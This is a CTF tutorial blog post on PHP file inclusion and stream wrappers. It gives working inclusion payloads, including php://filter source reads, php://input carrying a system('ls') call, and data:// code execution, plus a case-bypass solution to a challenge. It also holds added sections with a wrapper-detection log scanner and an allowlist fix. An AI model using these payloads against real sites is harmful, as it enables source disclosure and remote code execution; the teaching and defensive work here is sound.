CTF_Web: File Inclusion and PHP Pseudo-Protocols
2022-06-25 04:30:00 【AFCC_】
Preface
In CTFs, file inclusion and the use of pseudo-protocols are common topics. Challenges usually build on include(), require() and similar functions, which can produce exploitable vulnerabilities or command execution.
0x01 What is file inclusion
During development, to make code more reusable and avoid writing the same functions repeatedly, file inclusion functions were introduced. Including a file through one of these functions lets a script use the code in that file, which reduces development work. A single file can include one or more other files and use the functions defined in them.
0x02 File inclusion vulnerabilities
If the file types that may be included and the range the user can control are not clearly restricted, unexpected files can be included. This leads to disclosure of sensitive information and, in serious cases, to the inclusion of dangerous files and command execution.
0x03 PHP pseudo-protocols
Pseudo-protocols are the protocols that PHP supports and wraps (stream wrappers). There are many types; the common ones are:
file:// — Access the local file system
http:// — Access HTTP(s) URLs
ftp:// — Access FTP(s) URLs
php:// — Access various input/output streams (I/O streams)
zlib:// — Compression streams
data:// — Data (RFC 2397)
glob:// — Find path names matching a pattern
phar:// — PHP archive
ssh2:// — Secure Shell 2
rar:// — RAR
ogg:// — Audio streams
expect:// — Process interaction streams
In CTFs, the three pseudo-protocols file://, php:// and data:// are regularly used in different environments to test players' grasp of this topic. Each protocol consists of its own protocol header and a converter; concatenated, they tell the server what protocol type the incoming data is and how to parse it. For example:
1. file:// protocol
file:// is used to access the local file system and read local files. It is not affected by the allow_url_fopen and allow_url_include settings. When the file to include is not given as an absolute path, the path defaults to the directory where the script is located.
<?php
$file = $_GET['file'];
if ($file) {
    echo $file, "<br/>";
    include($file);
}
?>
Given a file flag.php whose content is oko!, passing ?file=flag.php returns:
flag.php
oko!
Here the path is resolved from the current directory. When an absolute path is passed in, the file is looked up directly at that path, for example ?file=D:\phpStudy\WWW\flag.php, which returns:
D:\\phpStudy\\WWW\\flag.php
oko!
2. php:// protocol
The php:// protocol has many variants. The most common are php://filter and php://input. filter is used to read file source code; the result is generally base64-encoded, because otherwise the file is executed when included and its contents cannot be seen. input is used to have the user's input executed as PHP code.
2.1 php://filter protocol
Its basic parameters are:
resource=<stream to be filtered> Required. Specifies the data stream you want to filter.
read=<filter list of the read chain> Optional. One or more filter names, separated by the pipe character (|).
write=<filter list of the write chain> Optional. One or more filter names, separated by the pipe character (|).
<filter list for both chains> Any filter list not prefixed with read= or write= is applied to the read or write chain as appropriate.
Common filters are:
string.rot13 Equivalent to str_rot13(); ROT13 transformation
string.toupper Equivalent to strtoupper(); converts to upper case
string.tolower Equivalent to strtolower(); converts to lower case
string.strip_tags Equivalent to strip_tags(); removes HTML and PHP tags
convert.base64-encode & convert.base64-decode Equivalent to base64_encode() and base64_decode(); base64 encoding and decoding
convert.quoted-printable-encode & convert.quoted-printable-decode Encoding and decoding between quoted-printable strings and 8-bit strings
There are also some encryption and compression filters that are not covered here.
The general usage of filter is:
- Read the file directly
php://filter/resource=flag.php
Output:
php://filter/resource=flag.php
oko!
- Base64-encode the contents of the file
php://filter/read=convert.base64-encode/resource=flag.php
Output:
php://filter/read=convert.base64-encode/resource=flag.php
b2tv
Here you can see that the basic format is: protocol header (php://filter) + /read(write)=filter (optional) + /resource=file name (required).
2.2 php://input protocol
php://input is a read-only stream that gives access to the raw data of the request; the data of the POST request is executed as PHP code. When the parameter passed in is opened as a file name, you can set the parameter to php://input and POST the file content you want; when PHP runs, it treats the POST content as the file content.
Usage:
?file=php://input
POST: <?php system('ls');?>
3. data:// protocol
Since PHP >= 5.2.0, the data:// stream wrapper can be used to pass data in the corresponding format. It can usually be used to execute PHP code. The data is generally base64-encoded for transmission, so that special characters the browser cannot parse do not cause problems. This requires:
allow_url_fopen: on
allow_url_include: on
PHP version: 5.2.0 or later
Usage:
- Transmit plaintext
?file=data://text/plain,<?php phpinfo()?>
- Transmit base64-encoded content
?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=
As this shows, the format is: protocol header (data://) + text/plain + (;base64) + , + plaintext (or encoded) data. Note that the symbol immediately before the transmitted data is a comma. If an encoding is specified, it is separated from the media type by a semicolon.
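A detection sketch for the three wrappers described above, added here as an example and not part of the original post: it scans access-log lines and flags query parameters whose decoded value starts with a stream-wrapper scheme, matching case-insensitively. The function name, the scheme list and the log lines are assumptions constructed for the example.

```php
<?php
// Added example: flag PHP stream-wrapper schemes in request parameters.
const WRAPPER_SCHEMES = ['php', 'data', 'file', 'phar', 'zlib', 'glob', 'expect', 'ftp', 'http', 'https'];

function find_wrapper_params(string $requestUri): array
{
    $pos = strpos($requestUri, '?');
    if ($pos === false) {
        return [];
    }
    parse_str(substr($requestUri, $pos + 1), $params); // one URL-decode pass
    $hits = [];
    foreach ($params as $name => $value) {
        if (!is_string($value)) {
            continue; // array-valued parameters are out of scope here
        }
        // Up to two more decode passes to catch double-encoded values.
        for ($i = 0; $i < 2; $i++) {
            $decoded = rawurldecode($value);
            if ($decoded === $value) {
                break;
            }
            $value = $decoded;
        }
        // Case-insensitive on purpose; the data: form without slashes is matched too.
        if (preg_match('~^(?:([a-z][a-z0-9.+-]*)://|(data):)~i', $value, $m)) {
            $scheme = strtolower($m[1] !== '' ? $m[1] : $m[2]);
            if (in_array($scheme, WRAPPER_SCHEMES, true)) {
                $hits[] = ['param' => (string) $name, 'scheme' => $scheme];
            }
        }
    }
    return $hits;
}

// Constructed access-log lines (not real traffic).
$log = [
    '203.0.113.5 - - [25/Jun/2022:04:30:00 +0000] "GET /index.php?file=flag.php HTTP/1.1" 200 12',
    '203.0.113.5 - - [25/Jun/2022:04:30:02 +0000] "GET /index.php?file=php://filter/read=convert.base64-encode/resource=flag.php HTTP/1.1" 200 16',
    '203.0.113.5 - - [25/Jun/2022:04:30:05 +0000] "POST /index.php?page=PHP://input HTTP/1.1" 200 40',
    '203.0.113.5 - - [25/Jun/2022:04:30:09 +0000] "GET /index.php?page=data%3A%2F%2Ftext%2Fplain%2Chello HTTP/1.1" 200 90',
];
foreach ($log as $line) {
    if (!preg_match('~"(?:GET|POST) (\S+) HTTP/~', $line, $req)) {
        continue;
    }
    foreach (find_wrapper_params($req[1]) as $hit) {
        printf("ALERT %s=%s:// in %s\n", $hit['param'], $hit['scheme'], $req[1]);
    }
}
```

The first log line produces no alert and the other three do. Access logs do not record the POST body, so for php://input only the parameter value is visible here.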
4. Example
See the solution to the World of Attack and Defense challenge Web_php_include.
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page = $_GET['page'];
while (strstr($page, "php://")) {
    $page = str_replace("php://", "", $page);
}
include($page);
?>
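POSTing the data through the PHP://input stream, or using data://text/plain;base64,xxxxxxxxxxxxx, completes the challenge. The loop removes only the exact string php://, and strstr() is case-sensitive, so neither value is changed before include() runs.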
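The challenge's filter beside an allowlist-based replacement, as an added example that is not part of the original post or the challenge: the request value is used only as a key into a fixed map, so no wrapper or path ever reaches include(). The page keys, file names and demo directory are hypothetical.

```php
<?php
// Added example (not from the original post). Page keys and file names are hypothetical.

// The challenge's filter, unchanged: only the exact string php:// is removed.
function blacklist_filter(string $page): string
{
    while (strstr($page, "php://")) {
        $page = str_replace("php://", "", $page);
    }
    return $page;
}

// Hardened form: the request value is only a key into a fixed map.
const PAGES = ['home' => 'home.php', 'about' => 'about.php'];

function resolve_page(string $key, string $baseDir): ?string
{
    if (!array_key_exists($key, PAGES)) {
        return null; // unknown key: nothing is included
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$key]);
    // Defence in depth: the file must exist and resolve inside $baseDir.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo directory and inputs.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_demo';
if (!is_dir($dir)) {
    mkdir($dir);
}
file_put_contents($dir . DIRECTORY_SEPARATOR . 'home.php', "<?php echo 'home';");

$inputs = ['home', 'php://input', 'PHP://input', 'data://text/plain,hello', '../flag.php'];
foreach ($inputs as $in) {
    $old = blacklist_filter($in);   // what the challenge code would include()
    $new = resolve_page($in, $dir); // what the hardened code would include()
    printf("%-24s blacklist: %-24s allowlist: %s\n", $in, $old, $new ?? '(rejected)');
}
```

Only the key home resolves to a file; every other input is rejected. Keeping allow_url_include off (the PHP default) additionally blocks data:// and php://input in include(), but it does not restrict file:// or php://filter, so the allowlist is still needed.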